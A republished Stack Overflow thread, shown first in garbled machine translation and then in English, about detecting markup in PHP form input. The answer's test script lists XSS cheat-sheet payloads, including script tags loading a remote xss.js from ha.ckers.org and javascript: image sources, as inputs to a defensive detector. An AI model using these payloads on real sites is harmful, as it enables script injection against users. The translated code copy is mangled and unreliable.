检测字符串输入是否包含HTML的正确方法是什么? [英] What is the correct way to detect whether string inputs contain HTML or not?

查看:150
本文介绍了检测字符串输入是否包含HTML的正确方法是什么?的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

在窗体上接收用户输入时,我想检测用户名或地址等字段是否不包含在XML(RSS提要)或(X)HTML(显示时)中具有特殊含义的标记。 p>

那么,哪些是检测输入的输入是否在HTML和XML上下文中不包含任何特殊字符的正确方法?

  if(mb_strpos($ data,'<')=== FALSE AND mb_strpos($ data,'>')=== FALSE)

  if(htmlspecialchars($ data,ENT_NOQUOTES,'UTF-8')=== $ data)

  if(preg_match(/ [^ \p {L} \  - 。'] / u,$文本))//问题:也缓存符号

我错过了其他任何东西,比如字节序列或其他棘手的方式来获取像javascript:这样的标记标签?据我所知,所有 XSS和CSFR攻击都需要 < / code>或> 来让浏览器执行代码(至少从Internet Explorer 6或更高版本开始) - 这是正确的吗?



我不想寻找某种东西来减少或过滤输入。我只是想在危险字符序列中使用XML或HTML上下文。 ( strip_tags()是非常不安全的。正如手册所说,它不检查格式不正确的HTML。)



更新



我想我需要澄清一下,有很多人通过转义来解决这个问题, 过滤危险字符。这不是问题,大多数简单的答案都无法解决问题。



更新2:示例




  • 用户提交输入

  • if(mb_strpos($ data,'<')=== FALSE AND mb_strpos ($ data,'>')=== FALSE)

  • 我保存它


    既然数据在我的应用程序中,我会用它做两件事 - 1)以HTML格式显示 - 或者2)显示在格式元素中进行编辑。



    第一个在XML和HTML上下文中是安全的

    < h2><?php print $ input ; ?>< / h2>'
    < xml>< item><?php print $ input;第二种形式更危险,但它仍然应该是安全的:



    更新3:工作代码



    您可以下载我创建的要点并将代码作为文本或HTML响应来查看我在说什么。这个简单的检查通过了 http://ha.ckers.org XSS备忘单和我找不到任何可以做到的事情。 (我忽略了Internet Explorer 6及以下版本)。



    我开始了另一项奖励,奖励某人可以用这种方法展示问题,它的实现。

    更新4:询问DOM



    这是我们想要的DOM保护 - 那么为什么不问问它? 帖木儿的答案引发了这种情况:

     函数not_markup($ string)
    {
    libxml_use_internal_errors(true);
    if($ xml = simplexml_load_string(< root> $ string< / root>))
    {
    return $ xml-> children() - > count()= == 0;



    if(not_markup($ _ POST ['title']))...


     <?php 
    $ strings = array();
    $ strings [] =<<< EOD
    ;; alert(String.fromCharCode(88,83,83))// \'; alert(String.fromCharCode(88,83 ,83))// ;警报(使用String.fromCharCode(88,83,83))// \;警报(使用String.fromCharCode(88,83,83))// - >< / SCRIPT> ;<>>< SCRIPT> alert(String.fromCharCode(88,83,83))< / SCRIPT>
    EOD;
    $ strings [] =<<< EOD
    '';! - < XSS> =& {()}
    EOD;
    $ strings [] =<<< EOD
    < SCRIPT SRC = http://ha.ckers.org/xss.js>< / SCRIPT>
    EOD;
    $ strings [] =<<< EOD
    这是一个安全文本
    EOD;
    $ strings [] =<<<< EOD
    < IMG SRC =javascript:alert('XSS');>
    EOD;
    $ strings [] =<<< EOD
    < IMG SRC = javascript:alert('XSS')>
    EOD;
    $ strings [] =<<<<< EOD
    <<<>&#118;&#97;&#115; &安培;#99;&安培;#114;&安培;#105;&安培;#112;&安培;#116;&安培;#58;&安培;#97;&安培;#108;&安培;#101;&安培;#114; &安培;#116;&安培;#40;&安培;#39;&安培;#88;&安培;#83;&安培;#83;&安培;#39;&安培;#41;>
    EOD;
    $ strings [] =<<< EOD
    perl -e'print>< IMG SRC = java\0script:alert(\XSS \)>; '>出
    EOD;
    $ strings [] =<<<< EOD
    < SCRIPT / XSS SRC =http://ha.ckers.org/xss.js>< / SCRIPT>
    EOD;
    $ strings [] =<<<< EOD
    < / TITLE>< SCRIPT> alert(XSS);< / SCRIPT>
    EOD;



    libxml_use_internal_errors(true);
    $ sourceXML ='< root>< element>值< / element>< / root>';
    $ sourceXMLDocument = simplexml_load_string($ sourceXML);
    $ sourceCount = $ sourceXMLDocument-> children() - > count();

    foreach($ string为$ string){
    $ unsafe = false;
    $ XML ='< root>< element>'。$ string。'< / element>< / root>';
    $ XMLDocument = simplexml_load_string($ XML);
    if($ XMLDocument === false){
    $ unsafe = true;
    } else {

    $ count = $ XMLDocument-> children() - > count();
    if($ count!= $ sourceCount){
    $ unsafe = true;



    echo($ unsafe?'Unsafe':'Safe')。':< pre>。htmlspecialchars($ string,ENT_QUOTES,'utf- 8')。'< / pre>< br /> ;'.\"\\\
    ;
    }
    ?>


    When receiving user input on forms I want to detect whether fields like "username" or "address" does not contain markup that has a special meaning in XML (RSS feeds) or (X)HTML (when displayed).

    So which of these is the correct way to detect whether the input entered doesn't contain any special characters in HTML and XML context?

    if (mb_strpos($data, '<') === FALSE AND mb_strpos($data, '>') === FALSE)
    

    or

    if (htmlspecialchars($data, ENT_NOQUOTES, 'UTF-8') === $data)
    

    or

    if (preg_match("/[^\p{L}\-.']/u", $text)) // problem: also caches symbols
    

    Have I missed anything else,like byte sequences or other tricky ways to get markup tags around things like "javascript:"? As far as I'm aware, all XSS and CSFR attacks require < or > around the values to get the browser to execute the code (well at least from Internet Explorer 6 or later anyway) - is this correct?

    I am not looking for something to reduce or filter input. I just want to locate dangerous character sequences when used in XML or HTML context. (strip_tags() is horribly unsafe. As the manual says, it doesn't check for malformed HTML.)

    Update

    I think I need to clarify that there are a lot people mistaking this question for a question about basic security via "escaping" or "filtering" dangerous characters. This is not that question, and most of the simple answers given wouldn't solve that problem anyway.

    Update 2: Example

    • User submits input
    • if (mb_strpos($data, '<') === FALSE AND mb_strpos($data, '>') === FALSE)
    • I save it

    Now that the data is in my application I do two things with it - 1) display in a format like HTML - or 2) display inside a format element for editing.

    The first one is safe in XML and HTML context

    <h2><?php print $input; ?></h2>' <xml><item><?php print $input; ?></item></xml>

    The second form is more dangerous, but it should still be safe:

    <input value="<?php print htmlspecialchars($input, ENT_QUOTES, 'UTF-8');?>">

    Update 3: Working Code

    You can download the gist I created and run the code as a text or HTML response to see what I'm talking about. This simple check passes the http://ha.ckers.org XSS Cheat Sheet, and I can't find anything that makes it though. (I'm ignoring Internet Explorer 6 and below).

    I started another bounty to award someone that can show a problem with this approach or a weakness in its implementation.

    Update 4: Ask a DOM

    It's the DOM that we want to protect - so why not just ask it? Timur's answer lead to this:

    function not_markup($string)
    {
        libxml_use_internal_errors(true);
        if ($xml = simplexml_load_string("<root>$string</root>"))
        {
            return $xml->children()->count() === 0;
        }
    }
    
    if (not_markup($_POST['title'])) ...
    

    解决方案

    I don't think you need to implement a huge algorithm to check if string has unsafe data - filters and regular expressions do the work. But, if you need a more complex check, maybe this will fit your needs:

    <?php
    $strings = array();
    $strings[] = <<<EOD
        ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    EOD;
    $strings[] = <<<EOD
        '';!--"<XSS>=&{()}
    EOD;
    $strings[] = <<<EOD
        <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    EOD;
    $strings[] = <<<EOD
        This is a safe text
    EOD;
    $strings[] = <<<EOD
        <IMG SRC="javascript:alert('XSS');">
    EOD;
    $strings[] = <<<EOD
        <IMG SRC=javascript:alert('XSS')>
    EOD;
    $strings[] = <<<EOD
        <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    EOD;
    $strings[] = <<<EOD
        perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
    EOD;
    $strings[] = <<<EOD
        <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    EOD;
    $strings[] = <<<EOD
        </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    EOD;
    
    
    
    libxml_use_internal_errors(true);
    $sourceXML = '<root><element>value</element></root>';
    $sourceXMLDocument = simplexml_load_string($sourceXML);
    $sourceCount = $sourceXMLDocument->children()->count();
    
    foreach( $strings as $string ){
        $unsafe = false;
        $XML = '<root><element>'.$string.'</element></root>';
        $XMLDocument = simplexml_load_string($XML);
        if( $XMLDocument===false ){
            $unsafe = true;
        }else{
    
            $count = $XMLDocument->children()->count();
            if( $count!=$sourceCount ){
                $unsafe = true;
            }
        }
    
        echo ($unsafe?'Unsafe':'Safe').': <pre>'.htmlspecialchars($string,ENT_QUOTES,'utf-8').'</pre><br />'."\n";
    }
    ?>
    

    这篇关于检测字符串输入是否包含HTML的正确方法是什么?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆